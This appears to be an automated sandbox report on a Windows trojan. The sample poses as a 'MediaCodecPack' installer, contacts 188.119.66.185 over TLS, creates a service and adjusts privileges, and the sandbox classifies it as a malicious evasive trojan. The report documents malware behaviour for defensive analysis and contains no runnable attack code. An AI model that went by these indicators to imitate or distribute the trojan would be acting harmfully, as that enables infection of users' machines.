                    Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49905
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49900
                    Source: unknownHTTPS traffic detected: 188.119.66.185:443 -> 192.168.2.4:49737 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 188.119.66.185:443 -> 192.168.2.4:49786 version: TLS 1.2
                    Source: is-SHN24.tmp.1.drBinary or memory string: DirectDrawCreateExmemstr_3a485914-1
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpCode function: 1_2_0042F520 NtdllDefWindowProc_A,1_2_0042F520
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpCode function: 1_2_00423B84 NtdllDefWindowProc_A,1_2_00423B84
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpCode function: 1_2_004125D8 NtdllDefWindowProc_A,1_2_004125D8
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpCode function: 1_2_00478AC0 NtdllDefWindowProc_A,1_2_00478AC0
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpCode function: 1_2_00457594 PostMessageA,PostMessageA,SetForegroundWindow,NtdllDefWindowProc_A,1_2_00457594
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpCode function: 1_2_0042E934: CreateFileA,DeviceIoControl,GetLastError,CloseHandle,SetLastError,1_2_0042E934
                    Source: C:\Users\user\Desktop\steel.exe.3.exeCode function: 0_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,0_2_00409448
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpCode function: 1_2_004555E4 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,1_2_004555E4
                    Source: C:\Users\user\Desktop\steel.exe.3.exeCode function: 0_2_0040840C0_2_0040840C
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpCode function: 1_2_004706A81_2_004706A8
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpCode function: 1_2_004809F71_2_004809F7
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpCode function: 1_2_004352C81_2_004352C8
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpCode function: 1_2_004673A41_2_004673A4
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpCode function: 1_2_0043DD501_2_0043DD50
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpCode function: 1_2_0043035C1_2_0043035C
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpCode function: 1_2_004444C81_2_004444C8
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpCode function: 1_2_004345C41_2_004345C4
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpCode function: 1_2_00444A701_2_00444A70
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpCode function: 1_2_00486BD01_2_00486BD0
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpCode function: 1_2_00430EE81_2_00430EE8
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpCode function: 1_2_0045F0C41_2_0045F0C4
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpCode function: 1_2_004451681_2_00445168
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpCode function: 1_2_0045B1741_2_0045B174
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpCode function: 1_2_004694041_2_00469404
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpCode function: 1_2_004455741_2_00445574
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpCode function: 1_2_004519BC1_2_004519BC
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpCode function: 1_2_00487B301_2_00487B30
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpCode function: 1_2_0048DF541_2_0048DF54
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeCode function: 2_2_004010002_2_00401000
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeCode function: 2_2_004067B72_2_004067B7
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeCode function: 2_2_609660FA2_2_609660FA
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeCode function: 2_2_6092114F2_2_6092114F
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeCode function: 2_2_6091F2C92_2_6091F2C9
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeCode function: 2_2_6096923E2_2_6096923E
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeCode function: 2_2_6093323D2_2_6093323D
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeCode function: 2_2_6095C3142_2_6095C314
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeCode function: 2_2_609503122_2_60950312
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeCode function: 2_2_6094D33B2_2_6094D33B
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeCode function: 2_2_6093B3682_2_6093B368
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeCode function: 2_2_6096748C2_2_6096748C
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeCode function: 2_2_6093F42E2_2_6093F42E
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeCode function: 2_2_609544702_2_60954470
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeCode function: 2_2_609615FA2_2_609615FA
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeCode function: 2_2_6096A5EE2_2_6096A5EE
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeCode function: 2_2_6096D6A42_2_6096D6A4
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeCode function: 2_2_609606A82_2_609606A8
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeCode function: 2_2_609326542_2_60932654
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeCode function: 2_2_609556652_2_60955665
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeCode function: 2_2_6094B7DB2_2_6094B7DB
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeCode function: 2_2_6092F74D2_2_6092F74D
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeCode function: 2_2_609648072_2_60964807
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeCode function: 2_2_6094E9BC2_2_6094E9BC
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeCode function: 2_2_609379292_2_60937929
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeCode function: 2_2_6093FAD62_2_6093FAD6
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeCode function: 2_2_6096DAE82_2_6096DAE8
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeCode function: 2_2_6094DA3A2_2_6094DA3A
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeCode function: 2_2_60936B272_2_60936B27
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeCode function: 2_2_60954CF62_2_60954CF6
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeCode function: 2_2_60950C6B2_2_60950C6B
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeCode function: 2_2_60966DF12_2_60966DF1
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeCode function: 2_2_60963D352_2_60963D35
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeCode function: 2_2_60909E9C2_2_60909E9C
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeCode function: 2_2_60951E862_2_60951E86
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeCode function: 2_2_60912E0B2_2_60912E0B
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeCode function: 2_2_60954FF82_2_60954FF8
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeCode function: 2_2_02BABAFD2_2_02BABAFD
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeCode function: 2_2_02BAD32F2_2_02BAD32F
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeCode function: 2_2_02BA70C02_2_02BA70C0
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeCode function: 2_2_02B9E07E2_2_02B9E07E
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeCode function: 2_2_02BAB6092_2_02BAB609
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeCode function: 2_2_02BB267D2_2_02BB267D
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeCode function: 2_2_02BABF152_2_02BABF15
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeCode function: 2_2_02BA874A2_2_02BA874A
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeCode function: 2_2_02BB0DB42_2_02BB0DB4
                    Source: Joe Sandbox ViewDropped File: C:\ProgramData\MediaCodecPack\sqlite3.dll 16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeCode function: String function: 02BB2A10 appears 135 times
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeCode function: String function: 02BA7760 appears 32 times
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpCode function: String function: 00408C0C appears 45 times
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpCode function: String function: 00406AC4 appears 43 times
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpCode function: String function: 0040595C appears 117 times
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpCode function: String function: 00457F1C appears 73 times
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpCode function: String function: 00403400 appears 60 times
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpCode function: String function: 00445DD4 appears 45 times
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpCode function: String function: 00457D10 appears 96 times
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpCode function: String function: 004344DC appears 32 times
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpCode function: String function: 004078F4 appears 43 times
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpCode function: String function: 00403494 appears 83 times
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpCode function: String function: 00403684 appears 225 times
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpCode function: String function: 00453344 appears 97 times
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpCode function: String function: 004460A4 appears 59 times
                    Source: steel.exe.3.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                    Source: steel.exe.3.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                    Source: steel.exe.3.tmp.0.drStatic PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
                    Source: is-67S07.tmp.1.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                    Source: is-67S07.tmp.1.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                    Source: is-67S07.tmp.1.drStatic PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
                    Source: is-5V918.tmp.1.drStatic PE information: Number of sections : 19 > 10
                    Source: sqlite3.dll.2.drStatic PE information: Number of sections : 19 > 10
                    Source: steel.exe.3.exe, 00000000.00000003.1732080677.0000000002168000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs steel.exe.3.exe
                    Source: steel.exe.3.exe, 00000000.00000003.1731820756.00000000023D0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs steel.exe.3.exe
                    Source: steel.exe.3.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                    Source: classification engineClassification label: mal92.troj.evad.winEXE@5/26@0/2
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeCode function: 2_2_02B9F8D0 FormatMessageA,GetLastError,FormatMessageA,GetLastError,2_2_02B9F8D0
                    Source: C:\Users\user\Desktop\steel.exe.3.exeCode function: 0_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,0_2_00409448
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpCode function: 1_2_004555E4 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,1_2_004555E4
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpCode function: 1_2_00455E0C GetModuleHandleA,GetProcAddress,GetDiskFreeSpaceA,1_2_00455E0C
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeCode function: CreateServiceA,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,2_2_00401CF9
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpCode function: 1_2_0046E0E4 GetVersion,CoCreateInstance,1_2_0046E0E4
                    Source: C:\Users\user\Desktop\steel.exe.3.exeCode function: 0_2_00409C34 FindResourceA,SizeofResource,LoadResource,LockResource,0_2_00409C34
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeCode function: 2_2_00401951 GetLocalTime,StartServiceCtrlDispatcherA,lstrcmpiW,2_2_00401951
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeCode function: 2_2_00401951 GetLocalTime,StartServiceCtrlDispatcherA,lstrcmpiW,2_2_00401951
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeCode function: 2_2_0040DEE9 StartServiceCtrlDispatcherA,2_2_0040DEE9
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpFile created: C:\Users\user\AppData\Local\ProgramsJump to behavior
                    Source: C:\Users\user\Desktop\steel.exe.3.exeFile created: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmpJump to behavior
                    Source: Yara matchFile source: 2.0.mediacodecpack3.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000001.00000002.2981700405.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000000.1743204779.0000000000401000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\is-VED6B.tmp, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe, type: DROPPED
                    Source: Yara matchFile source: C:\ProgramData\MediaCodecPack\MediaCodecPack.exe, type: DROPPED
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpFile read: C:\Windows\win.iniJump to behavior
                    Source: C:\Users\user\Desktop\steel.exe.3.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
                    Source: mediacodecpack3.exe, mediacodecpack3.exe, 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.2.dr, is-5V918.tmp.1.drBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                    Source: mediacodecpack3.exe, 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.2.dr, is-5V918.tmp.1.drBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                    Source: mediacodecpack3.exe, mediacodecpack3.exe, 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.2.dr, is-5V918.tmp.1.drBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
                    Source: mediacodecpack3.exe, 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.2.dr, is-5V918.tmp.1.drBinary or memory string: CREATE TABLE "%w"."%w_node"(nodeno INTEGER PRIMARY KEY, data BLOB);CREATE TABLE "%w"."%w_rowid"(rowid INTEGER PRIMARY KEY, nodeno INTEGER);CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY, parentnode INTEGER);INSERT INTO '%q'.'%q_node' VALUES(1, zeroblob(%d))
                    Source: mediacodecpack3.exe, 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.2.dr, is-5V918.tmp.1.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                    Source: mediacodecpack3.exe, 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.2.dr, is-5V918.tmp.1.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                    Source: mediacodecpack3.exe, 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.2.dr, is-5V918.tmp.1.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                    Source: mediacodecpack3.exe, 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.2.dr, is-5V918.tmp.1.drBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                    Source: mediacodecpack3.exe, 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.2.dr, is-5V918.tmp.1.drBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                    Source: mediacodecpack3.exe, 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.2.dr, is-5V918.tmp.1.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                    Source: mediacodecpack3.exe, 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.2.dr, is-5V918.tmp.1.drBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                    Source: mediacodecpack3.exe, mediacodecpack3.exe, 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.2.dr, is-5V918.tmp.1.drBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                    Source: steel.exe.3.exeString found in binary or memory: need to be updated. /RESTARTAPPLICATIONS Instructs Setup to restart applications. /NORESTARTAPPLICATIONS Prevents Setup from restarting applications. /LOADINF="filename" Instructs Setup to load the settings from the specified file after having checked t
                    Source: steel.exe.3.exeString found in binary or memory: /LOADINF="filename"
                    Source: C:\Users\user\Desktop\steel.exe.3.exeFile read: C:\Users\user\Desktop\steel.exe.3.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\steel.exe.3.exe "C:\Users\user\Desktop\steel.exe.3.exe"
                    Source: C:\Users\user\Desktop\steel.exe.3.exeProcess created: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp "C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp" /SL5="$2043C,3046688,56832,C:\Users\user\Desktop\steel.exe.3.exe"
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpProcess created: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe "C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe" -i
                    Source: C:\Users\user\Desktop\steel.exe.3.exeProcess created: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp "C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp" /SL5="$2043C,3046688,56832,C:\Users\user\Desktop\steel.exe.3.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpProcess created: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe "C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe" -iJump to behavior
                    Source: C:\Users\user\Desktop\steel.exe.3.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\steel.exe.3.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpSection loaded: textinputframework.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpSection loaded: coreuicomponents.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpSection loaded: shfolder.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpSection loaded: rstrtmgr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpSection loaded: msacm32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpSection loaded: winmmbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpSection loaded: winmmbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpSection loaded: riched20.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpSection loaded: usp10.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpSection loaded: msls31.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpSection loaded: explorerframe.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpSection loaded: sfc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpSection loaded: sfc_os.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeSection loaded: sqlite3.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeSection loaded: opcservices.dllJump to behavior
